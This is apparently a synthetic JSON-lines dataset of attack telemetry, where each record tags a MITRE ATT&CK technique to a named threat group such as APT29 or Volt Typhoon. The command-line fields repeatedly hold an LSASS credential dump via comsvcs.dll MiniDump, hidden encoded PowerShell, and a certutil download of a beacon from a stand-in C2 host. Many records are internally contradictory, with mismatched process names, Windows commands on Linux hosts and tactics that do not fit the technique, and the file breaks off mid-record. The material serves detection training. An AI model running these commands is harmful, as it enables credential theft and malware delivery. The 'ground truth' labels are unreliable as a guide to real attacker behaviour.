{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence","Privilege Escalation"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20250226T034644000Z_0012695","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.112.126.178","name":"WIN-FIN-SRV-9BZ9MNU5H4","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12695Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.147.216.85","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2945 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-14T04:13:19.000Z","user":{"name":"arn:aws:iam::seygk2zr59t7","sid":"S-1-5-21-862120288-844102505-3214"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Discovery","Impact","Execution"],"technique_id":"T1570"},"event_id":"evt_apt29_20260628T014350000Z_0012697","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.61.19.163","name":"AZURE-VM-QRPQLUQNJ4","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12697APT29T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.139.75.80","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-11T07:53:14.000Z","user":{"name":"i-hujvoip2x8ti","sid":"S-1-5-21-526065278-849534519-6578"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20251230T173804000Z_0012699","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.136.216.52","name":"APP-WEB-1FZAB3YKP5","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12699FIN7T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.68.169.59","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 745 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-21T04:33:31.000Z","user":{"name":"azuread\\rhb5ppupqm7t","sid":"S-1-5-21-314475419-899815756-5086"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20251124T122555000Z_0012701","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.133.12.222","name":"EC2-INST-EFANE5CWIN","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12701APT41T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.168.61.104","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1886 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-26T02:21:23.000Z","user":{"name":"arn:aws:iam::v992th6y8cbw","sid":"S-1-5-21-408289683-633866227-6884"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement","Execution"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20250420T052633000Z_0012703","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.214.165.76","name":"IAM-ROLE-HLKP2P4TCT","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12703Mustang PandaT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.35.90.243","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-13T21:32:18.000Z","user":{"name":"i-h38lue1hr9wq","sid":"S-1-5-21-528086444-173907945-2005"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Impact","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20260826T074036000Z_0012705","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.136.155.208","name":"DB-ORACLE-5YVBIY7JHA","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12705UNC4841T1021.006"},"network":{"domain":"github.com","dst_ip":"1.109.39.71","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1639 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-31T03:56:09.000Z","user":{"name":"azuread\\4n8qqrxs471e","sid":"S-1-5-21-813387565-637494329-1813"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Exfiltration"],"technique_id":"T1570"},"event_id":"evt_fin7_20260904T201029000Z_0012707","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.92.209.111","name":"IAM-ROLE-GCED6TFZSS","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12707FIN7T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.107.103.12","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-30T23:07:29.000Z","user":{"name":"svc_6e55gzzwbe5q","sid":"S-1-5-21-738554054-674876518-1881"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Impact","Reconnaissance","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250307T175729000Z_0012709","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.80.244.167","name":"AZURE-VM-KGCOS8CBK3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12709Lapsus$T1484.001"},"network":{"domain":"github.com","dst_ip":"1.32.204.9","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-12-24T06:28:00.000Z","user":{"name":"CORP\\bhnb3tzvhtet","sid":"S-1-5-21-142681708-579837966-6911"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Discovery"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20250706T065249000Z_0012711","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.147.123.110","name":"DB-ORACLE-5ABHRTD1UD","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12711FIN7T1484.001"},"network":{"domain":"github.com","dst_ip":"1.47.66.82","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-07-19T06:16:07.000Z","user":{"name":"arn:aws:iam::8fptzzxp8qs3","sid":"S-1-5-21-801348792-476267382-7523"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution","Collection"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20260111T155110000Z_0012713","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.220.135.146","name":"APP-WEB-C1VVT5YZ1A","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12713Lapsus$T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.85.204.135","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 554 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-09-01T10:50:24.000Z","user":{"name":"arn:aws:iam::adzn1zbj0ykl","sid":"S-1-5-21-709661151-960855960-9149"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Initial Access","Execution","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260627T103643000Z_0012715","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.255.16.134","name":"EC2-INST-ZPSBS7YJVR","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12715Scattered SpiderT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.33.102.185","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-02-17T22:21:25.000Z","user":{"name":"i-36dvpufwhsig","sid":"S-1-5-21-362035993-446492537-9963"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion","Impact"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250730T131924000Z_0012717","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.79.213.193","name":"EC2-INST-K691JIU4MN","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12717APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.132.169.238","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-21T22:11:47.000Z","user":{"name":"azuread\\qc8lu1cng9jc","sid":"S-1-5-21-565066230-914495501-4471"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Defense Evasion","Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20260725T045304000Z_0012719","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.165.5.58","name":"EC2-INST-670UIKAEVU","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12719Volt TyphoonT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.164.130.137","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-22T06:52:46.000Z","user":{"name":"i-52ukgyflv3jh","sid":"S-1-5-21-809171014-868571979-7808"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20260114T145437000Z_0012721","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.247.46.204","name":"DB-ORACLE-KD9SPZV7UB","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12721Lapsus$T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.141.199.120","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-11-17T12:26:27.000Z","user":{"name":"svc_koz2296eym6j","sid":"S-1-5-21-819907596-263672654-3666"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Reconnaissance","Collection"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260201T204829000Z_0012723","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.233.22.44","name":"IAM-ROLE-E4AGP2DNSN","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12723Lapsus$T1566.001"},"network":{"domain":"github.com","dst_ip":"1.178.53.251","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-03-08T21:48:35.000Z","user":{"name":"azuread\\9oyriyftv83s","sid":"S-1-5-21-920728759-209717139-7272"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Lateral Movement","Impact"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20250718T035116000Z_0012725","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.194.253.185","name":"AZURE-VM-T4PT6XHEDE","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12725Scattered SpiderT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.7.218.187","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1868 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-30T21:45:09.000Z","user":{"name":"svc_wn6i9nf60iyo","sid":"S-1-5-21-806975073-356796051-5747"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20250225T010812000Z_0012727","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.35.105.13","name":"IAM-ROLE-YOFMH5VBWI","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12727Volt TyphoonT1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.17.106.204","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-27T13:11:25.000Z","user":{"name":"arn:aws:iam::yiw1zh65geb4","sid":"S-1-5-21-566544908-411830355-6530"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20251113T064719000Z_0012729","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.226.3.153","name":"WIN-FIN-SRV-SAVD57Z8AO","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12729Mustang PandaT1531"},"network":{"domain":"github.com","dst_ip":"1.67.30.245","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-19T19:31:53.000Z","user":{"name":"CORP\\4rjbb1lnpps9","sid":"S-1-5-21-808865240-462775785-9764"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Execution"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250513T002608000Z_0012731","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.102.199.160","name":"WIN-FIN-SRV-YJX84ESPFY","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12731Volt TyphoonT1531"},"network":{"domain":"github.com","dst_ip":"1.179.102.1","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 805 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-04-30T07:35:25.000Z","user":{"name":"i-gtozoujihw6k","sid":"S-1-5-21-526648789-957206761-3137"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Persistence"],"technique_id":"T1531"},"event_id":"evt_lapsus_20261027T124556000Z_0012733","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.20.121.250","name":"AZURE-VM-XF8TB1RP2W","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12733Lapsus$T1531"},"network":{"domain":"github.com","dst_ip":"1.40.223.188","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-20T19:03:19.000Z","user":{"name":"svc_kx63i8eexckd","sid":"S-1-5-21-472377179-706355409-5140"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection","Persistence","Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20250517T155503000Z_0012735","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.74.165.119","name":"IAM-ROLE-D5W75HY464","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12735APT41T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.145.180.135","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-05T13:11:09.000Z","user":{"name":"arn:aws:iam::43fc2k6cl7kv","sid":"S-1-5-21-970432506-863946087-5675"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Initial Access"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260620T023247000Z_0012737","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.144.74.15","name":"WIN-FIN-SRV-INPZIKP4QW","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12737Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.3.88.136","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-01-20T02:52:50.000Z","user":{"name":"arn:aws:iam::ho9hhllo15he","sid":"S-1-5-21-715968374-978571924-4304"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Impact","Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20260522T215729000Z_0012739","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.93.10.170","name":"WIN-FIN-SRV-L012P6294B","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12739Scattered SpiderT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.113.180.181","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2535 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-05-28T16:38:55.000Z","user":{"name":"CORP\\a13ol71w969g","sid":"S-1-5-21-841432929-895777331-1360"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Credential Access"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20250319T113831000Z_0012741","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.168.249.136","name":"IAM-ROLE-U5ID9ZZFHX","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12741Volt TyphoonT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.43.41.81","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 775 C:\\temp\\lsass.dmp 